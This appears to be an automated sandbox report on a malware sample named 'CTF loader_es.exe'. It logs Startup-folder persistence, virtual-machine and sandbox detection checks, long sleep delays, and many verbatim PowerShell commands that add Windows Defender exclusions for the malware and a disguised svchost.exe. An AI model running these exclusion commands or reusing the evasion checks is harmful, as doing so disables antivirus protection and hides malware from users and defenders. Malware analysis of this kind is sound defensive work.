Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Section loaded: OutputDebugStringW count: 112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Section loaded: OutputDebugStringW count: 212

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLLUSER

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Window / User API: threadDelayed 2342
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Window / User API: threadDelayed 7399

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2368	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2680	Thread sleep count: 91 > 30
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2588	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2868	Thread sleep count: 86 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2500	Thread sleep count: 89 > 30
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2984	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2352	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2352	Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2468	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1840	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2184	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3196	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_025F096A GetSystemInfo,

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\

Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: powershell.exe, 00000007.00000003.2099707866.00000000006A7000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: VMwareVBox
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: CTF loader_es.exe, 00000004.00000002.2155381323.0000000003709000.00000004.00000001.sdmp	Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
